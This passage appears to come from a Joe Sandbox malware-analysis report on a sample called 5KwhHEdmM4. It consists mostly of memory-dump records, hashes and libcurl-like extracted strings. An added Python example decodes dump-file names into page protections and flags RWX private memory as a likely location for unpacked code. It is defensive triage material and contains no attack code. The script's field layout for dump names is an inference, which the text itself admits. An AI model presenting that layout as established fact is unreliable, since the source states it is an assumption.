                                                              • Opcode ID: bfdd8e7b143071fdacfe206498d9689a473f9d4d8ef193589446334eb697fc2a
                                                              • Instruction ID: 669f4b5fda9604ec3050ecde46807f423b8022c30e83031e5b0a694b8b37bee4
                                                              • Opcode Fuzzy Hash: bfdd8e7b143071fdacfe206498d9689a473f9d4d8ef193589446334eb697fc2a
                                                              • Instruction Fuzzy Hash: 732124EF53D1557DE22285A15F50AFB6B6EEADB330B308426FC07E3202E1E55E4A1531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 199fd50df5bc48a7d8c3314671437e018caf6993eb7349e170b8418caede97e1
                                                              • Instruction ID: cebc43807e58b58622e065aad75f9202f3f95423dff4bda79110f2d082327154
                                                              • Opcode Fuzzy Hash: 199fd50df5bc48a7d8c3314671437e018caf6993eb7349e170b8418caede97e1
                                                              • Instruction Fuzzy Hash: 0A2102EB13D2457EE22281A15F10AFB6B6EDAD7330B308436FC07E3202E2F45A495531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c56dcb3e6dbfc4ed9e612a25a06dd53f56446874b3f41461e3994ee806985a9c
                                                              • Instruction ID: 88e617d4047d9599129a45d11b0b0a04148735b31d47406cebcbd90cc2fedf17
                                                              • Opcode Fuzzy Hash: c56dcb3e6dbfc4ed9e612a25a06dd53f56446874b3f41461e3994ee806985a9c
                                                              • Instruction Fuzzy Hash: E421ACEF139104BCA52285A16F24AFB666EE6E7330F308436FC07E6602E2F45A492531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7f89c99c4cd6192276fc7300ec0931344787ad0a42213602f6656b5e0f7bd1d3
                                                              • Instruction ID: da3cff7ee49db480356e4e02606a33febc71f32ad1080cf782309c89a722a196
                                                              • Opcode Fuzzy Hash: 7f89c99c4cd6192276fc7300ec0931344787ad0a42213602f6656b5e0f7bd1d3
                                                              • Instruction Fuzzy Hash: 882180EF139114BCA52295A16F14AFB676EE6E7330B308432FC07E2A02E2F45F491531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3b2fad91d6dfbcc6d67179416bb22fd9a6fc5fb49ba0e321214f68377204e72
                                                              • Instruction ID: 86d675b56f39931f86141f4147875815637ae2236e1e89a2131fd8f044c1228c
                                                              • Opcode Fuzzy Hash: e3b2fad91d6dfbcc6d67179416bb22fd9a6fc5fb49ba0e321214f68377204e72
                                                              • Instruction Fuzzy Hash: A811E7EB13D2557DE62285616F10AF76B6DE6D7330F308426FC07E2502D1F46E491531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 11e58ec6708f0ded1dc6e40a98ecfb6f1b05c23a66007441400f906d55c9d761
                                                              • Instruction ID: 8ce372c3faa752935683b9ee5e6cbb5dd148ddb4219c8b38a9a7b92d7af37e4f
                                                              • Opcode Fuzzy Hash: 11e58ec6708f0ded1dc6e40a98ecfb6f1b05c23a66007441400f906d55c9d761
                                                              • Instruction Fuzzy Hash: 1B1102EB139114BDE62285A11F24AFB2B6ED6DB330F308026FC07E2602E2F46E491131
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6fda5767085ce1c83d6ac5ea9a63ffe62ba8687fc188079b6208416ed45bf490
                                                              • Instruction ID: 73b1a76e2511f1d7da5764045a625ed6d1721f4cec9e8dde2d16830e3c25e416
                                                              • Opcode Fuzzy Hash: 6fda5767085ce1c83d6ac5ea9a63ffe62ba8687fc188079b6208416ed45bf490
                                                              • Instruction Fuzzy Hash: 0401D2EB639108ACE61181616F20AFB67ADD7D7330F318422FC03E2501D2F46E495531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 527b7d207aaf3c9d6df50cc81cee903bb224bf7eb98796a425bd2047a234f3ac
                                                              • Instruction ID: 5cf749f6db739c64eca1d85e6a811c996637e7051a1f013ee0bffcf916aee444
                                                              • Opcode Fuzzy Hash: 527b7d207aaf3c9d6df50cc81cee903bb224bf7eb98796a425bd2047a234f3ac
                                                              • Instruction Fuzzy Hash: A601D4FB13E1456DE22280A12E106FA67ADE6D7330B318427FC03D1402D2E4AE091531
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp, Offset: 07250000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7250000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 671b777edb87504bbf923ff576523ed90e69ba294a21ac68a4cb232fa9c28678
                                                              • Instruction ID: e750c0b4a131a14e9d1c5c9ae676dca899efec1392f93adfd6a695d6f29b1976
                                                              • Opcode Fuzzy Hash: 671b777edb87504bbf923ff576523ed90e69ba294a21ac68a4cb232fa9c28678
                                                              • Instruction Fuzzy Hash: AAF028FB579105ACE62285A12F206FE67BCE6D7330F308837FC13D1545D2A45E091632
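                                                               The records above come from two kinds of memory: the image regions at 0x00D90000 and above ("based on PE: true") and the region at 0x07250000 that is not backed by a PE ("based on PE: false"). The dump names encode the page protection and region type, which is enough to triage where unpacked code lives. The following added example (not Joe Sandbox's code and not taken from its documentation) parses those names and labels each region. The Win32 constants are standard; the field positions inside the .sdmp name are an assumption inferred from the values on this page matching PAGE_* and MEM_* constants, and the sample list is copied from the names above.

```python
import re
from dataclasses import dataclass

# Standard Win32 page protection constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Standard Win32 region types (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# ASSUMPTION: field layout of a Joe Sandbox .sdmp name, inferred from this page
# (5th field carries PAGE_* values, 7th field carries MEM_* values). The other
# fields are kept but not interpreted.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<pass>[0-9a-f]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\.(?P<f6>[0-9a-f]{8})\."
    r"(?P<memtype>[0-9a-f]{8})\.(?P<f8>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Region:
    base: int
    protect: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    @property
    def is_rwx(self) -> bool:
        # Writable and executable at the same time (WRITECOPY counts: it is
        # writable via copy-on-write and still executable).
        p = self.protect & 0xFF
        return p in EXECUTABLE and p in WRITABLE


def parse_sdmp(name: str) -> Region:
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not an .sdmp name: {name}")
    return Region(int(m["base"], 16), int(m["protect"], 16), int(m["memtype"], 16))


def classify(region: Region) -> str:
    """Triage label. RWX private memory is where an unpacked or injected payload
    usually sits; RWX image memory means section protections were changed after
    load, which matches the report's 'changes PE section rights' signature."""
    if region.is_rwx and region.mem_type == 0x20000:
        return "rwx-private"
    if region.is_rwx and region.mem_type == 0x1000000:
        return "rwx-image"
    if (region.protect & 0xFF) in EXECUTABLE:
        return "exec"
    return "data"


def triage(names):
    """Return (base, protection, type, label) per dump name, sorted by base."""
    rows = []
    for n in names:
        r = parse_sdmp(n)
        rows.append((r.base, r.protect_name, r.type_name, classify(r)))
    return sorted(rows)


# Constructed sample: a subset of the dump names listed on this page.
SAMPLE = [
    "00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp",
    "00000000.00000002.1416799079.0000000007250000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for base, prot, typ, label in triage(SAMPLE):
        print(f"{base:#010x} {prot:24} {typ:12} {label}")
```

Run against the names on this page, the image at 0x00D91000 and the non-PE region at 0x07250000 both come back RWX; the private one is the region to carve and scan for a PE header or shellcode first, since nothing on disk accounts for it.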
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                              • API String ID: 0-1371176463
                                                              • Opcode ID: a4ec027196d4dbe273e80da0b3b73d5175204405d1b2403ade737865ef0b2317
                                                              • Instruction ID: e0b1f439592ae049e64ca0f46d0b0ee480f654b496184ca6891331edc2ef99b6
                                                              • Opcode Fuzzy Hash: a4ec027196d4dbe273e80da0b3b73d5175204405d1b2403ade737865ef0b2317
                                                              • Instruction Fuzzy Hash: 04B22675A08301ABDB249F25DC52B36BBD5AF64308F0C493EE88997382E775EC449772
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
                                                               • Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                              • API String ID: 0-122532811
                                                              • Opcode ID: ea76feefccb5c3b2f8aa77a7c5f0ae969c170486c7c2824dd2c82634893a1a16
                                                              • Instruction ID: 571eb08c2b4a4bc05b6f11e0b4599ea37cf8996815d3c6e456e0092a70fbd680
                                                              • Opcode Fuzzy Hash: ea76feefccb5c3b2f8aa77a7c5f0ae969c170486c7c2824dd2c82634893a1a16
                                                              • Instruction Fuzzy Hash: DF42E671B08701AFD708DE28DC41BABB6EAEFC4704F04892CF55D97391E775A9148BA2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Apr$Aug$Dec$Feb$Jan$Jul$Jun$Mar$May$Nov$Oct$Sep
                                                              • API String ID: 0-3977460686
                                                              • Opcode ID: 1776dc354b5fb26eed3b7411167a71e70f5e6190951a990d63f6496866bb052e
                                                              • Instruction ID: c434de6ad61999fb0b9c3a9812683c18a816a38e3285247a81a857b2f1fcd485
                                                              • Opcode Fuzzy Hash: 1776dc354b5fb26eed3b7411167a71e70f5e6190951a990d63f6496866bb052e
                                                              • Instruction Fuzzy Hash: 0A326CB1A083018BCB249F289C4135AB7D5AFD3334F19472DF9A58B3D2E7B4D94587A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                              • API String ID: 0-1574211403
                                                              • Opcode ID: 223d5ff5745db7d8033b48f2051b1f2f1cde12030cf1aebc176702bc42c1870c
                                                              • Instruction ID: 8539ca349894c26793601c501b9ea06e0947e0956f8789dc7a40e2389da64d16
                                                              • Opcode Fuzzy Hash: 223d5ff5745db7d8033b48f2051b1f2f1cde12030cf1aebc176702bc42c1870c
                                                              • Instruction Fuzzy Hash: F861DAA5A0830167E714A624BC52B3BB2D9EBD5348F04683DFD4AB7393FE71E9148253
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                              • API String ID: 0-1914377741
                                                              • Opcode ID: 5b4b9910889ac26dd3fbf44e645a075909405a84cc3bb4faf1cead14e5cf7410
                                                              • Instruction ID: 4d48bce38b096bc207a4d5d18bc2911b1ef98fa5503e0f64b91a6672008dca90
                                                              • Opcode Fuzzy Hash: 5b4b9910889ac26dd3fbf44e645a075909405a84cc3bb4faf1cead14e5cf7410
                                                              • Instruction Fuzzy Hash: C5724730A08B41DFE7358A28E4427E6B7D29F91744F0C861CEDC65B39AE776D884C7A1
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID: localeconv
                                                              • String ID: $d$nil)
                                                              • API String ID: 3737801528-394766432
                                                              • Opcode ID: 8675dc9eee094748c4626a9fc2096272c89d872ba534ef789e5e76b9ee8e84a0
                                                              • Instruction ID: 184c8be58b3e55bd0fa3a394c24fcd550d59fa0c48a2fc1732037e7f546d60c0
                                                              • Opcode Fuzzy Hash: 8675dc9eee094748c4626a9fc2096272c89d872ba534ef789e5e76b9ee8e84a0
                                                              • Instruction Fuzzy Hash: 4C13AD706093128FD729CF68C08066AFBE1BFC9314F554A2DFA958B359D771E849CB82
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414465145.0000000001806000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414688021.00000000019C0000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414707318.00000000019C2000.00000080.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d90000_5KwhHEdmM4.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                              • API String ID: 0-3476178709
                                                              • Opcode ID: c553cf86d1b43641dec7edaeff2bfeee7ee47d93d40ee2c4d450cedd4e780fa6
                                                              • Instruction ID: 121f859d29e3578447e010c6a596680fc6edab3fce9c1a0fc146914a30f43aac
                                                              • Opcode Fuzzy Hash: c553cf86d1b43641dec7edaeff2bfeee7ee47d93d40ee2c4d450cedd4e780fa6
                                                              • Instruction Fuzzy Hash: 9531C563714A4566EB2C011AEC46F3E105BC3C6B14F6E823DFA069A6CAE8A59E045275
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1413108358.0000000000D91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true
• Associated: 00000000.00000002.1413085142.0000000000D90000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001467000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1413108358.0000000001469000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414057526.000000000146C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000146E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.000000000170D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017ED000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.00000000017F7000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1414076607.0000000001805000.00000040.00000001.01000000.00000003.sdmp
